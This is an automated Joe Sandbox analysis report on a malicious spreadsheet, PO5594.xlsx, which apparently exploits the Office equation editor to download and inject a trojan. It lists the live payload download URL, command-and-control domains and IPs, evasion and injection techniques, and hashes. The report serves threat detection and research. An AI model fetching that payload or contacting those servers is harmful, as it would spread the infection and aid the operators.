          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery14Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 513501 Sample: PO5594.xlsx Startdate: 02/11/2021 Architecture: WINDOWS Score: 100 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 Multi AV Scanner detection for submitted file 2->53 55 10 other signatures 2->55 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 27 2->15         started        process3 dnsIp4 47 103.232.53.25, 49165, 80 AIMS-MY-NETAIMSDataCentreSdnBhdMY Viet Nam 10->47 35 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->35 dropped 37 C:\Users\Public\vbc.exe, PE32 10->37 dropped 75 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->75 17 vbc.exe 17 10->17         started        39 C:\Users\user\Desktop\~$PO5594.xlsx, data 15->39 dropped file5 signatures6 process7 file8 33 C:\Users\user\AppData\Local\...\xggenq.dll, PE32 17->33 dropped 57 Machine Learning detection for dropped file 17->57 59 Tries to detect virtualization through RDTSC time measurements 17->59 61 Injects a PE file into a foreign processes 17->61 21 vbc.exe 17->21         started        signatures9 process10 signatures11 63 Modifies the context of a thread in another process (thread injection) 21->63 65 Maps a DLL or memory area into another process 21->65 67 Sample uses process hollowing technique 21->67 69 Queues an APC in another process (thread injection) 21->69 24 explorer.exe 21->24 injected process12 dnsIp13 41 sarahannsartstudio.com 162.241.253.231, 49170, 80 UNIFIEDLAYER-AS-1US United States 24->41 43 www.spacex-live.net 104.21.75.173, 49166, 80 CLOUDFLARENETUS United States 24->43 45 4 other IPs or domains 24->45 71 System process connects to network (likely due to code injection or exploit) 24->71 73 Uses netstat to query active network connections and open ports 24->73 28 NETSTAT.EXE 24->28         started        signatures14 process15 signatures16 77 Modifies the context of a thread in another process (thread injection) 28->77 79 Maps a DLL or memory area into another process 28->79 81 Tries to detect virtualization through RDTSC time measurements 28->81 31 cmd.exe 28->31         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO5594.xlsx32%VirustotalBrowse
          PO5594.xlsx30%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.NETSTAT.EXE.4119a0.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.vbc.exe.400000.4.unpack100%AviraTR/Patched.Ren.Gen2Download File
          4.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          5.0.vbc.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.0.vbc.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.vbc.exe.2f90000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.NETSTAT.EXE.27e796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          5.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          5.1.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          sarahannsartstudio.com3%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://www.spacex-live.net/ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do00%Avira URL Cloudsafe
          https://www.metanetgateway.com/ddzw/0%Avira URL Cloudsafe
          www.passionfruitny.com/ddzw/0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://www.schittstore.com/ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do00%Avira URL Cloudsafe
          http://treyresearch.net0%URL Reputationsafe
          https://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0J0%Avira URL Cloudsafe
          http://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do00%Avira URL Cloudsafe
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://103.232.53.25/8880/vbc.exe0%Avira URL Cloudsafe
          http://www.sarahannsartstudio.com/ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do00%Avira URL Cloudsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.spacex-live.net
          		104.21.75.173
          		truetrue
            		unknown
            www.metanetgateway.com
            		75.2.60.5
            		truetrue
              		unknown
              sarahannsartstudio.com
              		162.241.253.231
              		truetrueunknown
              schittstore.com
              		66.29.132.90
              		truetrue
                		unknown
                www.sarahannsartstudio.com
                		unknown
                		unknowntrue
                  		unknown
                  www.schittstore.com
                  		unknown
                  		unknowntrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.spacex-live.net/ddzw/?h2Mdq=Z+FzwJtUDkwgABdyd+p8UeqxtpX8YY+y3UFx7cJDGSHChxct3TL8QRd2MFxOEFehDmKc8w==&_x=gVp0dvG0DtZT6do0true
                    • Avira URL Cloud: safe
                    		unknown
                    www.passionfruitny.com/ddzw/true
                    • Avira URL Cloud: safe
                    		low
                    http://www.schittstore.com/ddzw/?h2Mdq=eu2i37xABBm77RmOTVlK/UzsyDYSkffg03LYHul4MxZENkm7/tK6Jp9Y8VUWWe4q58P2rA==&_x=gVp0dvG0DtZT6do0true
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JmGnSxw4GGM5lA==&_x=gVp0dvG0DtZT6do0true
                    • Avira URL Cloud: safe
                    		unknown
                    http://103.232.53.25/8880/vbc.exetrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.sarahannsartstudio.com/ddzw/?h2Mdq=iXrnxWa2MIQCLF3pcDg6+qoW1dWPNK8gD+C0AcHvSyjXkMlp/HpcZgrhMm+aOjdhifJKjg==&_x=gVp0dvG0DtZT6do0true
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.windows.com/pctv.explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpfalse
                      		high
                      http://investor.msn.comexplorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.piriform.com/ccleanerpexplorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmpfalse
                            		high
                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.mozilla.com0explorer.exe, 00000006.00000000.546883814.0000000007329000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.metanetgateway.com/ddzw/NETSTAT.EXE, 00000007.00000002.666910547.0000000002962000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000000.463068973.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.466962477.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.drfalse
                              		high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpfalse
                                		high
                                http://treyresearch.netexplorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.metanetgateway.com/ddzw/?h2Mdq=CC4eYJ6GdM3g7jV/74DGeVNO7dTe5083KAYqQjLLOiGFZCFwrjOGC7P0JNETSTAT.EXE, 00000007.00000002.666910547.0000000002962000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmpfalse
                                  		high
                                  http://java.sun.comexplorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.487124317.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.474694873.0000000001EC0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478152663.0000000001BE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000000.463068973.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.466962477.0000000000409000.00000008.00020000.sdmp, vbc.exe.2.drfalse
                                      		high
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.482100672.00000000045D6000.00000004.00000001.sdmpfalse
                                        		high
                                        http://investor.msn.com/explorer.exe, 00000006.00000000.543228196.0000000002AE0000.00000002.00020000.sdmpfalse
                                          		high
                                          http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.489880080.0000000004513000.00000004.00000001.sdmpfalse
                                            		high
                                            http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.498308172.0000000004650000.00000002.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.%s.comPAvbc.exe, 00000004.00000002.474694873.0000000001EC0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.478152663.0000000001BE0000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            		low
                                            http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              https://support.mozilla.orgexplorer.exe, 00000006.00000000.542019759.0000000000255000.00000004.00000020.sdmpfalse
                                                		high
                                                http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.489138123.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.514802576.0000000001C60000.00000002.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                103.232.53.25
                                                		unknownViet Nam
                                                		45668AIMS-MY-NETAIMSDataCentreSdnBhdMYtrue
                                                66.29.132.90
                                                		schittstore.comUnited States
                                                		19538ADVANTAGECOMUStrue
                                                104.21.75.173
                                                		www.spacex-live.netUnited States
                                                		13335CLOUDFLARENETUStrue
                                                75.2.60.5
                                                		www.metanetgateway.comUnited States
                                                		16509AMAZON-02UStrue
                                                162.241.253.231
                                                		sarahannsartstudio.comUnited States
                                                		46606UNIFIEDLAYER-AS-1UStrue

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:513501
                                                Start date:02.11.2021
                                                Start time:09:25:44
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 52s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:PO5594.xlsx
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:11
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winXLSX@9/20@4/5
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 27.4% (good quality ratio 26.1%)
                                                • Quality average: 73.1%
                                                • Quality standard deviation: 28.8%
                                                HCA Information:
                                                • Successful, ratio: 86%
                                                • Number of executed functions: 105
                                                • Number of non-executed functions: 104
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .xlsx
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                09:26:37API Interceptor160x Sleep call for process: EQNEDT32.EXE modified
                                                09:26:50API Interceptor35x Sleep call for process: vbc.exe modified
                                                09:27:07API Interceptor214x Sleep call for process: NETSTAT.EXE modified
                                                09:27:58API Interceptor1x Sleep call for process: explorer.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                103.232.53.25PO0945.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.25/9990/vbc.exe

                                                Domains

                                                No context

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                AIMS-MY-NETAIMSDataCentreSdnBhdMYPO0945.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.25
                                                Confirmation Transfer Copy MT103-Ref-088091030101_PDF.exeGet hashmaliciousBrowse
                                                • 103.232.55.66
                                                MVSEACON KOBE.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.184
                                                INVOICE56K.xlsxGet hashmaliciousBrowse
                                                • 103.232.54.181
                                                INV564.xlsxGet hashmaliciousBrowse
                                                • 103.232.54.181
                                                Confirmation Transfer Copy MT102-Ref-0001030101_PDF.exeGet hashmaliciousBrowse
                                                • 103.232.55.66
                                                RECEIPT878.xlsxGet hashmaliciousBrowse
                                                • 103.232.54.181
                                                MAERSK666.xlsxGet hashmaliciousBrowse
                                                • 103.232.54.181
                                                Remittance copy.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.136
                                                MV MELINA.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.184
                                                Order_102121.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.136
                                                MMC Metal Corregir Cotizacin.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.42
                                                BM09 INV.PL.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.136
                                                lod4.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.136
                                                lod4.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.136
                                                lod2.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.136
                                                Payment_Order.xlsxGet hashmaliciousBrowse
                                                • 103.232.53.136
                                                INVOICE827.xlsxGet hashmaliciousBrowse
                                                • 103.232.54.181
                                                INVOICE707.xlsxGet hashmaliciousBrowse
                                                • 103.232.54.181
                                                INVOICE44.xlsxGet hashmaliciousBrowse
                                                • 103.232.54.181
                                                ADVANTAGECOMUSEQ034989.exeGet hashmaliciousBrowse
                                                • 66.29.141.56
                                                Message.htmlGet hashmaliciousBrowse
                                                • 66.29.132.29
                                                Message.htmlGet hashmaliciousBrowse
                                                • 66.29.132.29
                                                RFQ#.exeGet hashmaliciousBrowse
                                                • 66.29.137.46
                                                lCFjxhAqu3.exeGet hashmaliciousBrowse
                                                • 66.29.132.143
                                                dhlexcel9078.excel.exeGet hashmaliciousBrowse
                                                • 66.29.151.197
                                                Proforma Invoices.exeGet hashmaliciousBrowse
                                                • 66.29.130.249
                                                tgSQwVSEzE.exeGet hashmaliciousBrowse
                                                • 66.29.130.249
                                                QUOTE N #U00b0 067.exeGet hashmaliciousBrowse
                                                • 66.29.145.43
                                                PO08485.xlsxGet hashmaliciousBrowse
                                                • 66.29.145.86
                                                3sO4kwopMH.exeGet hashmaliciousBrowse
                                                • 66.29.130.249
                                                FzvFtf2XXK.exeGet hashmaliciousBrowse
                                                • 66.29.130.249
                                                pKD3j672HL.exeGet hashmaliciousBrowse
                                                • 66.29.130.249
                                                dec.exeGet hashmaliciousBrowse
                                                • 66.29.141.211
                                                PkF9Fg2Tnc.exeGet hashmaliciousBrowse
                                                • 66.29.142.214
                                                2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                                • 66.29.130.249
                                                jnnbbMX9Ch.exeGet hashmaliciousBrowse
                                                • 66.29.130.249
                                                vbc.exeGet hashmaliciousBrowse
                                                • 66.29.130.249
                                                PURCHASE ORDER 29kva.exeGet hashmaliciousBrowse
                                                • 66.29.145.99
                                                CpUNO6WMEm.exeGet hashmaliciousBrowse
                                                • 66.29.130.249

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Category:downloaded
                                                Size (bytes):292696
                                                Entropy (8bit):7.940580532253791
                                                Encrypted:false
                                                SSDEEP:6144:wBlL/cZwF4JmEVpM2MJhVRcGO+LTYKJhUVTj9qsYKGV77ECn:CeZUSpMHwf4YRqsWvn
                                                MD5:11CBFA99FB5EBE8C09674E79B9834D96
                                                SHA1:6E94C5EF59E7A989D93C799217FBF1803B3BB4A4
                                                SHA-256:B7F38916FF521E44E651031EE54E631805F13963BAAF6FF6E3CC1AA72F1D0A43
                                                SHA-512:8429269ED2A747CF11DB3972AFA4A7A0CD59B4EA61D6D189EB17B660A66DD2A7FDEB6CD4F4439044665069060477F856D588634B0CF01F5F67CD6A039FE00CD9
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                Reputation:low
                                                IE Cache URL:http://103.232.53.25/8880/vbc.exe
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF.rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@..........................................................................t.......................................................................................p..|............................text....Z.......\.................. ..`.rdata.......p.......`..............@..@.data...8............r..............@....ndata.......P...........................rsrc................x..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2962AA49.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):10202
                                                Entropy (8bit):7.870143202588524
                                                Encrypted:false
                                                SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DD5845C.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):68702
                                                Entropy (8bit):7.960564589117156
                                                Encrypted:false
                                                SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3275C968.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):6364
                                                Entropy (8bit):7.935202367366306
                                                Encrypted:false
                                                SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                                MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                                SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                                SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                                SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35BED6CA.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):19408
                                                Entropy (8bit):7.931403681362504
                                                Encrypted:false
                                                SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                Malicious:false
